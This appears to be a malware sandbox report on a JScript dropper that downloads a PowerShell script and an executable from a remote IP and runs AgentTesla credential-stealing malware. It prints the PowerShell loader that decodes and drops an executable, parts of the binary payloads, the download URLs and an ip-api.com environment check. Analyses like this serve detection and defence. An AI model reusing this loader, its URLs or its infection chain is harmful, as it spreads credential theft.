                                                                  Mar 18, 2025 08:03:33.921622038 CET192.168.2.41.1.1.10xef30Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                  Mar 18, 2025 08:03:35.179347038 CET192.168.2.41.1.1.10xd709Standard query (0)212.20.149.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Mar 18, 2025 08:03:24.337415934 CET1.1.1.1192.168.2.40x7743No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                  Mar 18, 2025 08:03:33.942161083 CET1.1.1.1192.168.2.40xef30Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                  Mar 18, 2025 08:03:35.190536022 CET1.1.1.1192.168.2.40xd709Name error (3)212.20.149.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                  • 176.65.144.3
                                                                  • ip-api.com
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.449721176.65.144.3807260C:\Windows\System32\wscript.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 18, 2025 08:03:18.325815916 CET329OUTGET /dev/devil.ps1 HTTP/1.1
                                                                  Accept: */*
                                                                  Accept-Language: en-ch
                                                                  UA-CPU: AMD64
                                                                  Accept-Encoding: gzip, deflate
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                  Host: 176.65.144.3
                                                                  Connection: Keep-Alive
                                                                  Mar 18, 2025 08:03:19.002636909 CET1236INHTTP/1.1 200 OK
                                                                  Date: Tue, 18 Mar 2025 07:03:18 GMT
                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                  Last-Modified: Mon, 17 Mar 2025 08:28:15 GMT
                                                                  ETag: "12351-6308591d076a3"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 74577
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Data Raw: 24 53 41 46 41 47 47 41 47 58 48 58 48 58 3d 5b 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 22 51 57 51 57 53 41 41 44 41 46 2e 65 78 65 22 29 0d 0a 5b 49 4f 2e 46 69 6c 65 5d 3a 3a 57 72 69 74 65 41 6c 6c 42 79 74 65 73 28 24 53 41 46 41 47 47 41 47 58 48 58 48 58 2c 5b 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 46 41 4b 6b 30 57 36 38 41 41 41 41 41 41 41 41 41 41 4f 41 41 41 67 45 4c 41 54 [TRUNCATED]
                                                                  Data Ascii: $SAFAGGAGXHXHX=[IO.Path]::Combine($env:TEMP,"QWQWSAADAF.exe")[IO.File]::WriteAllBytes($SAFAGGAGXHXHX,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAKk0W68AAAAAAAAAAOAAAgELATAAALAAAAAmAAAAAAAACiABAABAAAAAIAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAABgAQAABAAAAAAAAAIAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAACxGAABPAAAAAAABALoFAAAAAAAAAAAAAAAAAAAAAAAAAEABAAwAAADQRQAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAEACAAAAAAAAAAAAAAAAEAAAEgAAAAAAAAAAAAAAC4tTDMDL0YYFBwAAAAgAAAAHgAAAAQAAAAAAAAAAAAAAAAAAEAAAOAudGV4dAAAALKtAAAAQAAAAK4AAAAiAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAAC6BQAAAAABAAAGAAAA0AAAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAEAAAAAAgAQAAAgAAANYAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAQAEAAAIAAADYAAAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                  Mar 18, 2025 08:03:19.002654076 CET224INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                  Mar 18, 2025 08:03:19.002665997 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                  Mar 18, 2025 08:03:19.002679110 CET1236INData Raw: 49 7a 57 39 38 50 73 42 73 38 77 2f 50 74 38 58 6c 48 49 73 35 2b 4a 44 2f 42 57 4f 53 48 69 75 48 4a 75 49 61 4c 59 34 56 65 72 48 6c 36 52 69 50 42 70 49 57 73 56 41 66 35 30 34 33 2f 4b 74 74 65 48 33 53 71 5a 56 72 57 45 72 66 47 33 67 4f 73
                                                                  Data Ascii: IzW98PsBs8w/Pt8XlHIs5+JD/BWOSHiuHJuIaLY4VerHl6RiPBpIWsVAf5043/KtteH3SqZVrWErfG3gOsYo32BO4YHfGKCsfVcDyeWDVrRddyTRz0uiEnG0sCfrW0mqB7K3NnozdAxaJIxYdvwwa/GBNAbkaslFFL6Vm3z1BpicHCI9HTXVUL9vIa8igQNEm5BIpltmyLaFzdjmNUN1ek7g3u/KZ5zHkxfuEbZuciYvnkH2JZz
                                                                  Mar 18, 2025 08:03:19.002690077 CET248INData Raw: 37 2b 4d 7a 32 36 70 70 4a 57 68 51 63 64 45 4d 68 5a 47 46 54 6f 47 61 6e 78 34 36 36 50 58 56 67 44 48 68 66 49 69 31 59 6c 42 49 62 72 4b 43 37 6a 55 54 77 69 6c 57 61 7a 4e 33 68 6a 4b 65 69 72 77 76 70 34 62 62 56 68 6a 74 54 67 79 4f 38 30
                                                                  Data Ascii: 7+Mz26ppJWhQcdEMhZGFToGanx466PXVgDHhfIi1YlBIbrKC7jUTwilWazN3hjKeirwvp4bbVhjtTgyO80avD6shXzNgp1uRC6/uNEDetl082LJu2SUO9FR2+qRJyj15A6zJigZPQRa+s3pGZ4gq1kX4V9ElE21gV3PaifGcqidmWW5oSpt1ucboBcyFGs+F8xfczgV9RXxutRPNAApO+S/28tCh8ls+efWRd3pXXOZiVnzRzVC
                                                                  Mar 18, 2025 08:03:19.002738953 CET1236INData Raw: 38 37 47 6f 32 4e 6b 58 4b 66 69 70 6b 41 58 54 70 73 36 42 4a 68 52 52 51 56 6a 6f 74 71 56 74 4a 66 62 41 75 6c 69 38 47 74 51 37 65 4c 70 48 5a 7a 72 6d 54 51 72 35 58 44 52 32 62 79 4c 4e 74 70 34 31 6c 57 34 6d 4c 70 53 56 38 34 47 59 50 4b
                                                                  Data Ascii: 87Go2NkXKfipkAXTps6BJhRRQVjotqVtJfbAuli8GtQ7eLpHZzrmTQr5XDR2byLNtp41lW4mLpSV84GYPKsn7hfRW7PyP+Qz2/hWEL/2QmUtefiXkKFhqz4afu8pdctzNN50hYBmo5N7sAdi7fejC8/G9NCeFnjOtnldxVGt4ysw/RTrU/nhcPQgFkzDRm+8JMHN1KnJGOtLGqgyUv/mz0wGMMebkwZAi8Cg/xUlj0jo7rQmoT4
                                                                  Mar 18, 2025 08:03:19.002751112 CET1236INData Raw: 33 2f 65 6f 54 65 78 70 6c 50 4d 69 31 4b 4c 4c 63 70 33 75 6a 4e 67 4a 66 6e 32 4c 59 75 75 4b 6c 71 57 62 2f 68 47 47 41 42 66 36 34 77 7a 32 48 6d 6f 6c 4f 78 57 34 78 6b 61 42 78 51 68 61 6b 30 38 43 43 6a 73 61 31 52 52 55 33 4c 37 48 56 57
                                                                  Data Ascii: 3/eoTexplPMi1KLLcp3ujNgJfn2LYuuKlqWb/hGGABf64wz2HmolOxW4xkaBxQhak08CCjsa1RRU3L7HVW1u0Bs60QgqkYyoYIjLhrCyFkgHCo04yXE7atS+ydZWnyjYDro1sVyBbRcrD51bn3F9kZMJOsV6LOOrm/fGfWx5qdRBMenDYb2HMuCg80Hqya99RCO19wSdO7QMtZHvlbhQl07LBf2FiveyFinFFtmIvBRAPXri2Ek
                                                                  Mar 18, 2025 08:03:19.002760887 CET248INData Raw: 56 56 75 66 6f 53 46 58 34 7a 34 71 2f 6c 44 73 6a 55 48 41 68 74 77 65 61 4d 4a 32 39 62 77 4d 69 71 4b 6c 68 30 70 59 45 30 42 73 63 68 78 31 76 4e 4a 56 56 6b 4e 48 49 6e 49 75 4a 41 47 6f 72 4c 50 52 35 6d 62 4e 53 44 66 30 39 42 65 58 67 4a
                                                                  Data Ascii: VVufoSFX4z4q/lDsjUHAhtweaMJ29bwMiqKlh0pYE0Bschx1vNJVVkNHInIuJAGorLPR5mbNSDf09BeXgJR0YRCZshu86fpm5T9vAxF137WlgavqMTPGBEHg2a8FliZoJ6E35nAQbnr0hkCc6WEe23H96QMJNGdIyzg3uWLNku3Y0sxFZiME1v8kgyPb0O/MZOakHutQ3yz8HMbCx81dkpnWUA4oIb2ir86LpK+ZKWEnMhV1yXi
                                                                  Mar 18, 2025 08:03:19.002770901 CET1236INData Raw: 56 70 77 61 43 36 73 52 6c 68 65 59 61 79 46 68 47 66 61 51 59 6f 39 37 6c 51 37 57 39 52 38 6b 74 45 61 6d 6e 2f 70 30 64 31 72 66 36 67 38 4a 64 72 70 57 61 57 41 32 34 31 72 55 36 71 6f 4d 70 4d 7a 6e 31 55 4b 4a 34 42 49 6b 6e 59 53 79 72 58
                                                                  Data Ascii: VpwaC6sRlheYayFhGfaQYo97lQ7W9R8ktEamn/p0d1rf6g8JdrpWaWA241rU6qoMpMzn1UKJ4BIknYSyrXf6PG3E1Uq5MlFVtZHDkr8cTKCq3lxM7xnZfsHjY90Tn0+V+BLPRJDunKV5Xpzl4xJmTr+HgBNbt+ZfPcU78rW3tXqAkYCI0l4O4Pq5ftalVQfexwQH+IVAlLzYdg0bLMMIyZw4ioKra0vjkoJVUOo6IYqluztRcN3
                                                                  Mar 18, 2025 08:03:19.002783060 CET1236INData Raw: 51 42 6c 69 50 36 42 4c 38 46 30 54 34 52 6a 4f 4a 41 4c 4a 47 70 2f 4b 52 6c 74 31 71 55 64 59 68 5a 62 53 64 69 51 2f 38 2f 6e 2b 77 76 79 48 32 51 46 54 4c 46 41 2f 75 6b 49 4c 78 77 68 7a 41 78 50 51 42 51 44 63 36 6c 6f 51 49 67 63 31 4f 6a
                                                                  Data Ascii: QBliP6BL8F0T4RjOJALJGp/KRlt1qUdYhZbSdiQ/8/n+wvyH2QFTLFA/ukILxwhzAxPQBQDc6loQIgc1OjX1OXhJofrdYJcbUfpCixkP8dXYy2IWs8R4UyGv+jFgIxe1PN8iODwae+MCWuL9SuJLOkEs/Ogx9RIQY3Yti31OHfGzGeK1G32ltJ8bM8lVKBmTFJ+e0fDZiAJfyCTA4y4/WEP4SvV7SLKeQHcIwpn7c/F5Khekbwh
                                                                  Mar 18, 2025 08:03:19.007565022 CET1236INData Raw: 6f 72 2b 4d 53 38 37 45 4e 58 41 4d 6e 34 71 4a 51 37 52 55 4c 36 36 2b 38 30 54 47 51 34 49 54 43 48 41 59 7a 79 4d 69 58 31 71 6f 6d 31 59 44 54 41 69 71 42 79 6d 65 6a 4f 68 55 78 67 46 41 6e 33 6b 4a 76 4e 36 31 47 4a 44 51 4f 4f 57 53 68 73
                                                                  Data Ascii: or+MS87ENXAMn4qJQ7RUL66+80TGQ4ITCHAYzyMiX1qom1YDTAiqBymejOhUxgFAn3kJvN61GJDQOOWShsY+0Hf/pg6rAk6cxcugruGuD0AwgShtgYWZP76OMffaSHr5QNlvLwU94S/k3/0PD1t4Ylixr+yZ8zPFqnb+vlcPfO0wRp42ZkRgS4gJudS0xSho7blWzTfEtFCe5lkvlYaiIfwWhlfAa+1V5D4WOM6a6qgT78xMSi4


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.449723176.65.144.3802976C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 18, 2025 08:03:22.342149973 CET73OUTGET /dev/DEV.exe HTTP/1.1
                                                                  Host: 176.65.144.3
                                                                  Connection: Keep-Alive
                                                                  Mar 18, 2025 08:03:23.045909882 CET1236INHTTP/1.1 200 OK
                                                                  Date: Tue, 18 Mar 2025 07:03:22 GMT
                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                  Last-Modified: Tue, 11 Mar 2025 15:54:49 GMT
                                                                  ETag: "3be00-630131bd532ab"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 245248
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-msdownload
                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ea 78 a9 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b2 03 00 00 0a 00 00 00 00 00 00 be d1 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 d1 03 00 53 00 00 00 00 e0 03 00 1a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELxe @ @hS H.text `.rsrc@@.reloc@BH6H>H}>b&gyOA{KF'uI0uy8`qhSw/a\=!t@Knz~2n$)&#Lt^Xtcom.apple.SafariixKZ-4xV4xV~draGon~~F@7%m$~}is50m_76q~[b8dKZShwCLGkLRk
                                                                  Mar 18, 2025 08:03:23.045932055 CET1236INData Raw: 06 23 4e 58 07 01 06 04 05 02 07 04 03 0c 3d 0e 4b fe f9 d4 21 02 04 04 05 02 07 04 03 0c 3d 0e 4b fe f9 d4 21 f3 26 81 c4 39 86 db 92 71 a3 b9 e6 53 7a 95 7c 00 00 00 00 00 00 ff 00 00 80 00 00 00 80 80 00 ff 00 00 00 80 00 80 00 80 80 00 00 00
                                                                  Data Ascii: #NX=K!=K!&9qSz|Unable to resolve HTTP prox(*WW~W(+}X*~s}c(9sI}b*{x*"}x*J(z
                                                                  Mar 18, 2025 08:03:23.045943975 CET1236INData Raw: 28 19 00 00 0a 02 72 8c 1f 00 70 28 ef 00 00 06 2a 1e 02 7b 98 00 00 04 2a 22 02 03 7d 98 00 00 04 2a 4a 02 28 19 00 00 0a 02 72 ef 21 00 70 28 f3 00 00 06 2a 1e 02 7b 99 00 00 04 2a 22 02 03 7d 99 00 00 04 2a 4a 02 28 19 00 00 0a 02 72 5b 23 00
                                                                  Data Ascii: (rp(*{*"}*J(r!p(*{*"}*J(r[#p(*{*"}*J(r$p(*{*"}*J(r%p(*{*"}*J(r)p(*{*"}*J(r*p(*{*"
                                                                  Mar 18, 2025 08:03:23.045954943 CET1236INData Raw: 00 04 2a 1e 02 7b c0 00 00 04 2a 22 02 03 7d c0 00 00 04 2a 42 72 1c 15 00 70 28 41 00 00 0a 80 d2 00 00 04 2a 1e 02 7b d3 00 00 04 2a 22 02 03 7d d3 00 00 04 2a 1e 02 7b d4 00 00 04 2a 22 02 03 7d d4 00 00 04 2a 1e 02 7b dc 00 00 04 2a 22 02 03
                                                                  Data Ascii: *{*"}*Brp(A*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*J(s(*J((}*(((((((*{*"}
                                                                  Mar 18, 2025 08:03:23.045986891 CET1236INData Raw: 04 20 0c 00 00 00 fe 0e 00 00 00 fe 0c 00 00 20 07 00 00 00 fe 01 39 13 00 00 00 7e 0e 00 00 04 39 1a 00 00 00 20 08 00 00 00 fe 0e 00 00 00 fe 0c 00 00 20 0a 00 00 00 fe 01 39 13 00 00 00 7e 0f 00 00 04 39 27 01 00 00 20 0b 00 00 00 fe 0e 00 00
                                                                  Data Ascii: 9~9 9~9' 9sS 9($ 9(+9 9( 9(
                                                                  Mar 18, 2025 08:03:23.045998096 CET1236INData Raw: 00 00 00 00 00 71 00 00 00 61 01 00 00 d2 01 00 00 82 00 00 00 01 00 00 01 1b 30 05 00 1e 02 00 00 04 00 00 11 20 00 00 00 00 fe 0e 07 00 38 cb 00 00 00 00 fe 0c 07 00 20 04 00 00 00 fe 01 39 16 00 00 00 fe 0c 00 00 6f 27 00 00 0a fe 0e 03 00 20
                                                                  Data Ascii: qa0 8 9o' 9(p 9s( 9o) >d 9
                                                                  Mar 18, 2025 08:03:23.046010017 CET776INData Raw: 00 a7 58 01 10 00 00 00 00 02 00 75 01 d8 4d 02 10 00 00 00 00 13 30 04 00 32 03 00 00 06 00 00 11 20 00 00 00 00 fe 0e 03 00 38 10 03 00 00 00 fe 0c 03 00 20 0a 00 00 00 fe 01 39 18 00 00 00 fe 0c 01 00 20 08 00 00 00 72 1b 01 00 70 a2 20 0b 00
                                                                  Data Ascii: XuM02 8 9 rp 9 r/p 9 (> 9~9 9 (?
                                                                  Mar 18, 2025 08:03:23.046020985 CET1236INData Raw: 00 00 fe 0e 03 00 00 fe 0c 03 00 20 00 00 00 00 fe 01 39 0a 00 00 00 00 20 01 00 00 00 fe 0e 03 00 00 fe 0c 03 00 20 12 00 00 00 fe 01 39 05 00 00 00 38 05 00 00 00 38 eb fc ff ff fe 0c 00 00 72 fd 01 00 70 28 21 00 00 0a 2a 00 00 13 30 04 00 79
                                                                  Data Ascii: 9 988rp(!*0y 8a 9 rp 9 ( 9 rp
                                                                  Mar 18, 2025 08:03:23.046030998 CET1236INData Raw: 72 09 00 00 70 a2 20 06 00 00 00 fe 0e 01 00 00 fe 0c 01 00 20 00 00 00 00 fe 01 39 0a 00 00 00 00 20 01 00 00 00 fe 0e 01 00 00 fe 0c 01 00 20 07 00 00 00 fe 01 39 05 00 00 00 38 05 00 00 00 38 d6 fe ff ff fe 0c 00 00 28 1f 00 00 0a 2a 00 00 03
                                                                  Data Ascii: rp 9 988(*0n 8Z 9~~"(@ 9"~ (A~!(@ 9"(?rp(>(B
                                                                  Mar 18, 2025 08:03:23.046044111 CET1236INData Raw: fe 0e 0c 00 00 fe 0c 0c 00 20 21 00 00 00 fe 01 39 16 00 00 00 fe 0c 09 00 6f 4a 00 00 0a fe 0e 00 00 20 22 00 00 00 fe 0e 0c 00 00 fe 0c 0c 00 20 10 00 00 00 fe 01 39 1b 00 00 00 fe 0c 04 00 28 4b 00 00 0a 8c 4c 00 00 01 fe 0e 00 00 20 11 00 00
                                                                  Data Ascii: !9oJ " 9(KL 98> 98 9(LJ 9"(M jX(N
                                                                  Mar 18, 2025 08:03:23.050818920 CET1236INData Raw: 00 fe 01 39 0a 00 00 00 2a 20 03 00 00 00 fe 0e 04 00 00 fe 0c 04 00 20 01 00 00 00 fe 01 39 13 00 00 00 7e 24 00 00 04 3a 3f 00 00 00 20 02 00 00 00 fe 0e 04 00 00 fe 0c 04 00 20 00 00 00 00 fe 01 39 0a 00 00 00 00 20 01 00 00 00 fe 0e 04 00 00
                                                                  Data Ascii: 9* 9~$:? 9 988rp %(Xrp(@(Y ? ,oZ([(&&*k0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.449724208.95.112.1805376C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Mar 18, 2025 08:03:24.362596035 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                  Host: ip-api.com
                                                                  Connection: Keep-Alive
                                                                  Mar 18, 2025 08:03:24.850461006 CET175INHTTP/1.1 200 OK
                                                                  Date: Tue, 18 Mar 2025 07:03:23 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 6
                                                                  Access-Control-Allow-Origin: *
                                                                  X-Ttl: 60
                                                                  X-Rl: 44
                                                                  Data Raw: 66 61 6c 73 65 0a
                                                                  Data Ascii: false


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  • File
                                                                  • Registry
                                                                  • Network

                                                                  Click to dive into process behavior distribution

                                                                  Target ID:0
                                                                  Start time:03:03:03
                                                                  Start date:18/03/2025
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_111101111001.js"
                                                                  Imagebase:0x7ff651a10000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true
                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                  Target ID:9
                                                                  Start time:03:03:18
                                                                  Start date:18/03/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"
                                                                  Imagebase:0x7ff7016f0000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true
                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                  Target ID:10
                                                                  Start time:03:03:18
                                                                  Start date:18/03/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff62fc20000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:11
                                                                  Start time:03:03:21
                                                                  Start date:18/03/2025
                                                                  Path:C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\QWQWSAADAF.exe"
                                                                  Imagebase:0x3b0000
                                                                  File size:55'808 bytes
                                                                  MD5 hash:509DA2F325053AC8CFC07C6EDDE04DE6
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.1367785643.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.1367785643.0000000003F79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:12
                                                                  Start time:03:03:22
                                                                  Start date:18/03/2025
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                  Imagebase:0xe80000
                                                                  File size:56'368 bytes
                                                                  MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.2446694240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2454758646.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:moderate
                                                                  Has exited:false
                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                  Call Graph

                                                                  Hide Legend
                                                                  • Executed
                                                                  • Not Executed
